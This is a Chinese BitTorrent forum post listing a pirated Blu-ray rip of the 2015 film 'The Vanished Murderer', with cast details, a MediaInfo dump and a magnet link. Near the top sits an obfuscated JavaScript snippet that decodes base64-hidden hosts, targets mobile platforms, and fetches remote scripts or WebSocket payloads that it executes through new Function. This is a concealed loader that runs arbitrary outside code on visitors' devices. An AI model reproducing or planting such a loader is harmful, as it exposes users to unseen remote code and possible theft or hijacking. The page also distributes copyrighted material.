消失的凶手[国语配音/粤语配音].The.Vanished.Murderer.2015.1080p.BluRay.x265.10bit.DTS.2Audio 5.63GB

版主小s 1月前 211

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 消失的凶手 / 消失的子弹2 / The Vanished Murderer
◎年  代 2015
◎产  地 中国大陆 / 中国香港
◎类  别 动作 / 悬疑 / 犯罪
◎语  言 粤语 / 汉语普通话
◎上映日期 2015-11-27(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt5190950/
◎豆瓣评分 5.0/10 (30072人评价)
◎豆瓣链接 https://movie.douban.com/subject/25778483/
◎片  长 120分钟
◎导  演 罗志良 Chi-Leung Law (id:1274275)
◎编  剧 杨倩玲 Sin Ling Yeung (id:1301472)
◎演  员 刘青云 Sean Lau (id:1007251)
       林家栋 Ka Tung Lam (id:1050329)
       李小璐 Xiaolu Li (id:1027770)
       江一燕 Yiyan Jiang (id:1274286)
       郭晓东 Xiaodong Guo (id:1274230)
       凤小岳 Rhydian Vaughan (id:1274684)
       孙佳君 Paulyn Sun (id:1050664)
       海陆 Lu Hai (id:1313957)
       李治源 Zhiyuan Li (id:1422046)
       曹操 Jonathan Kos-Read (id:1274972)
       刘洵 Shun Lau (id:1274304)
       于小彤 Xiaotong Yu (id:1276052)
       李栋 Dong Li (id:1454613)
       冯远文 Yuen Man Fung (id:1369778)
       李健威 Kin-wai Lee (id:1326655)
       温皓 Hao Wen (id:1396699)
       谷垣健治 Kenji Tanigaki (id:1335515)

◎标  签 悬疑 / 刘青云 / 犯罪 / 香港 / 2015 / 中国电影 / 中国 / 香港电影

◎简  介
  银行相继倒闭,大批失业游民流落街头。一连串离奇自杀案件仿佛指引着松东路去探究隐藏在其背后更大的黑幕。十年前被掩埋的屠村案件被揭开、疑犯通过文字游戏传递着口令,接踵而至的案件掀起了巨大的恐慌,城中风云攒动,人人自危,富商、警察、教授、学生……每个人的言行举止都充满疑点,而每个人都在猜测下一个离奇自杀的会不会是自己?究竟是谁密谋了这一切,让这个原本美好的地方变成了绝望之城?寻找真相迫在眉睫……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 26076111588434332997993000772120730786 (0x139E138FE072370DAEC30D221DE5DCA2)

  4. Complete name                            : The.[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.63 GiB

  8. Duration                                 : 2 h 0 min

  9. Overall bit rate                         : 6 665 kb/s

  10. Movie name                               : The Vanished Murderer - Blu-ray?

  11. Encoded date                             : UTC 2021-08-20 08:34:44

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 0 min

  23. Bit rate                                 : 4 355 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 24.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.116

  33. Stream size                              : 3.68 GiB (65%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Language                                 : Chinese

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio #1

  40. ID                                       : 2

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 2 h 0 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 510 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 1.27 GiB (23%)

  54. Title                                    : Mandarin

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Audio #2

  59. ID                                       : 3

  60. ID in the original source medium         : 4353 (0x1101)

  61. Format                                   : E-AC-3

  62. Format/Info                              : Enhanced AC-3

  63. Commercial name                          : Dolby Digital Plus

  64. Format profile                           : Blu-ray Disc

  65. Codec ID                                 : A_EAC3

  66. Duration                                 : 2 h 0 min

  67. Bit rate mode                            : Constant

  68. Bit rate                                 : 768 kb/s

  69. Channel(s)                               : 8 channels

  70. Channel layout                           : L R C LFE Ls Rs Lb Rb

  71. Sampling rate                            : 48.0 kHz

  72. Frame rate                               : 31.250 FPS (1536 SPF)

  73. Compression mode                         : Lossy

  74. Stream size                              : 664 MiB (12%)

  75. Title                                    : Cantonese

  76. Language                                 : Chinese

  77. Service kind                             : Complete Main

  78. Default                                  : No

  79. Forced                                   : No

  80. Original source medium                   : Blu-ray


  81. Text #1

  82. ID                                       : 4

  83. ID in the original source medium         : 4609 (0x1201)

  84. Format                                   : PGS

  85. Muxing mode                              : zlib

  86. Codec ID                                 : S_HDMV/PGS

  87. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration                                 : 1 h 54 min

  89. Bit rate                                 : 19.1 kb/s

  90. Count of elements                        : 2313

  91. Stream size                              : 15.6 MiB (0%)

  92. Title                                    : chs

  93. Language                                 : Chinese

  94. Default                                  : Yes

  95. Forced                                   : No

  96. Original source medium                   : Blu-ray


  97. Text #2

  98. ID                                       : 5

  99. ID in the original source medium         : 4608 (0x1200)

  100. Format                                   : PGS

  101. Muxing mode                              : zlib

  102. Codec ID                                 : S_HDMV/PGS

  103. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration                                 : 1 h 54 min

  105. Bit rate                                 : 20.6 kb/s

  106. Count of elements                        : 2313

  107. Stream size                              : 16.8 MiB (0%)

  108. Title                                    : cht

  109. Language                                 : Chinese

  110. Default                                  : No

  111. Forced                                   : No

  112. Original source medium                   : Blu-ray


  113. Text #3

  114. ID                                       : 6

  115. ID in the original source medium         : 4610 (0x1202)

  116. Format                                   : PGS

  117. Muxing mode                              : zlib

  118. Codec ID                                 : S_HDMV/PGS

  119. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration                                 : 1 h 54 min

  121. Bit rate                                 : 25.2 kb/s

  122. Count of elements                        : 2313

  123. Stream size                              : 20.6 MiB (0%)

  124. Title                                    : eng

  125. Language                                 : English

  126. Default                                  : No

  127. Forced                                   : No

  128. Original source medium                   : Blu-ray


  129. Menu

  130. 00:00:00.000                             : 第 01 章

  131. 00:06:36.166                             : 第 02 章

  132. 00:13:18.666                             : 第 03 章

  133. 00:19:06.958                             : 第 04 章

  134. 00:26:32.000                             : 第 05 章

  135. 00:33:14.125                             : 第 06 章

  136. 00:38:14.916                             : 第 07 章

  137. 00:43:56.208                             : 第 08 章

  138. 00:48:52.166                             : 第 09 章

  139. 00:54:51.333                             : 第 10 章

  140. 01:00:52.166                             : 第 11 章

  141. 01:05:46.250                             : 第 12 章

  142. 01:12:59.708                             : 第 13 章

  143. 01:18:01.541                             : 第 14 章

  144. 01:24:16.125                             : 第 15 章

  145. 01:28:23.541                             : 第 16 章

  146. 01:36:19.458                             : 第 17 章

  147. 01:44:01.041                             : 第 18 章

  148. 01:49:18.291                             : 第 19 章

  149. 01:54:56.625                             : 第 20 章



TAGS 动作 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:BF613AFF75ABD86734CA8B7318109EC168C14748
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖